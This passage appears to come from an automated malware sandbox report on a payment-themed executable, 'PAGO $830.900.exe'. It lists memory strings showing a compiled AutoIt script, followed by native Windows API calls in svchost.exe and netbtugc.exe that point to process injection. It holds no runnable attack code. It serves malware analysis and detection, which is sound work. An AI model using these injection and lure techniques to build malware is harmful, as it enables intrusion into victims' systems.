memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_660ef0c4-2
            Source: PAGO $830.900.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b2427842-b
            Source: PAGO $830.900.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_aa80c54a-5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C063 NtClose,2_2_0042C063
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FA0 NtQuerySection,2_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F90 NtProtectVirtualMemory,2_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FE0 NtCreateFile,2_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F60 NtCreateProcessEx,2_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EA0 NtAdjustPrivilegesToken,2_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E80 NtReadVirtualMemory,2_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DB0 NtEnumerateKey,2_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DD0 NtDelayExecution,2_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D00 NtSetInformationFile,2_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CA0 NtQueryInformationToken,2_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CC0 NtQueryVirtualMemory,2_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C00 NtQueryInformationProcess,2_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C60 NtCreateKey,2_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73090 NtSetValueKey,2_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73010 NtOpenDirectoryObject,2_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D10 NtOpenProcessToken,2_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D70 NtOpenThread,2_2_03B73D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03924340 NtSetContextThread,LdrInitializeThunk,4_2_03924340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03924650 NtSuspendThread,LdrInitializeThunk,4_2_03924650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03922BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03922BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03922BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922B60 NtClose,LdrInitializeThunk,4_2_03922B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922AD0 NtReadFile,LdrInitializeThunk,4_2_03922AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922AF0 NtWriteFile,LdrInitializeThunk,4_2_03922AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922FB0 NtResumeThread,LdrInitializeThunk,4_2_03922FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922FE0 NtCreateFile,LdrInitializeThunk,4_2_03922FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922F30 NtCreateSection,LdrInitializeThunk,4_2_03922F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_03922E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922EE0 NtQueueApcThread,LdrInitializeThunk,4_2_03922EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922DD0 NtDelayExecution,LdrInitializeThunk,4_2_03922DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03922DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03922D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03922D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03922CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03922C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922C60 NtCreateKey,LdrInitializeThunk,4_2_03922C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039235C0 NtCreateMutant,LdrInitializeThunk,4_2_039235C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039239B0 NtGetContextThread,LdrInitializeThunk,4_2_039239B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922B80 NtQueryInformationFile,4_2_03922B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922AB0 NtWaitForSingleObject,4_2_03922AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922F90 NtProtectVirtualMemory,4_2_03922F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922FA0 NtQuerySection,4_2_03922FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922F60 NtCreateProcessEx,4_2_03922F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922EA0 NtAdjustPrivilegesToken,4_2_03922EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922E30 NtWriteVirtualMemory,4_2_03922E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922DB0 NtEnumerateKey,4_2_03922DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922D00 NtSetInformationFile,4_2_03922D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922CC0 NtQueryVirtualMemory,4_2_03922CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922CF0 NtOpenProcess,4_2_03922CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03922C00 NtQueryInformationProcess,4_2_03922C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03923090 NtSetValueKey,4_2_03923090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03923010 NtOpenDirectoryObject,4_2_03923010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03923D10 NtOpenProcessToken,4_2_03923D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03923D70 NtOpenThread,4_2_03923D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DA8E60 NtReadFile,4_2_02DA8E60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DA8F50 NtDeleteFile,4_2_02DA8F50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DA8CF0 NtCreateFile,4_2_02DA8CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DA9000 NtClose,4_2_02DA9000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DA9160 NtAllocateVirtualMemory,4_2_02DA9160
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DDD588: CreateFileW,DeviceIoControl,CloseHandle,0_2_00DDD588
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DD1145 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00DD1145
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DDE814 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00DDE814
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DD81EE0_2_00DD81EE
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D7E3F00_2_00D7E3F0
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DAE4A00_2_00DAE4A0
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DA66FB0_2_00DA66FB
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00E047A80_2_00E047A8
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D9CA300_2_00D9CA30
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D7AB300_2_00D7AB30
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D8ADFD0_2_00D8ADFD
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DA6D790_2_00DA6D79
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D792A00_2_00D792A0
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D8D3B50_2_00D8D3B5
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D913240_2_00D91324
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D916960_2_00D91696
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D977AB0_2_00D977AB
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D8B7280_2_00D8B728
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D979DA0_2_00D979DA
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D799D00_2_00D799D0
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D919400_2_00D91940
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D91C070_2_00D91C07
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D97C370_2_00D97C37
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DFBD6B0_2_00DFBD6B
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D91EC20_2_00D91EC2
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DA9E8E0_2_00DA9E8E
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D8BEAD0_2_00D8BEAD
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE1F640_2_00DE1F64
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_013C20680_2_013C2068
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181132_2_00418113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9C32_2_0040F9C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9BC2_2_0040F9BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022092_2_00402209
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022102_2_00402210
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162FE2_2_004162FE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162BC2_2_004162BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004163032_2_00416303
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FBE32_2_0040FBE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC632_2_0040DC63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402DC02_2_00402DC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E6532_2_0042E653
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C003E62_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F02_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA3522_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC02C02_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE02742_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF41A22_2_03BF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C001AA2_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF81CC2_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA1182_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B301002_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC81582_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD20002_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C02_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B407702_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B647502_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C6E02_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C005912_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B405352_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEE4F62_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE44202_2_03BE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF24462_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF6BD72_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB402_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA802_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A02_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0A9A62_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B569622_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B268B82_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E8F02_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4A8402_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B428402_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBEFA02_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE02_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC82_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60F302_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE2F302_2_03BE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B82F282_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4F402_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52E902_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFCE932_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEEDB2_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEE262_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40E592_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B58DBF2_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3ADE02_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDCD1F2_2_03BDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4AD002_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0CB52_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30CF22_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40C002_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B8739A2_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF132D2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D34C2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A02_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C02_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4B1B02_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B16B2_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F1722_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7516C2_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF70E92_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF0E02_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF0CC2_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C02_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF7B02_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B856302_2_03B85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C095C32_2_03C095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDD5B02_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF75712_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF43F2_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B314602_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FB802_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB5BF02_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7DBF92_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFB762_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDDAAC2_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B85AA02_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE1AA32_2_03BE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEDAC62_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB3A6C2_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFA492_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7A462_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD59102_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B499502_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B9502_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B438E02_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD8002_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFFB12_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41F922_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFF092_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B49EB02_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FDC02_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7D732_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF1D5A2_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B43D402_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFCF22_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB9C322_2_03BB9C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039B03E64_2_039B03E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038FE3F04_2_038FE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039AA3524_2_039AA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039702C04_2_039702C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039902744_2_03990274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039B01AA4_2_039B01AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039A41A24_2_039A41A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039A81CC4_2_039A81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0398A1184_2_0398A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038E01004_2_038E0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039781584_2_03978158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039820004_2_03982000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038EC7C04_2_038EC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039147504_2_03914750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038F07704_2_038F0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0390C6E04_2_0390C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039B05914_2_039B0591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038F05354_2_038F0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0399E4F64_2_0399E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039944204_2_03994420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039A24464_2_039A2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039A6BD74_2_039A6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039AAB404_2_039AAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038EEA804_2_038EEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038F29A04_2_038F29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039BA9A64_2_039BA9A6
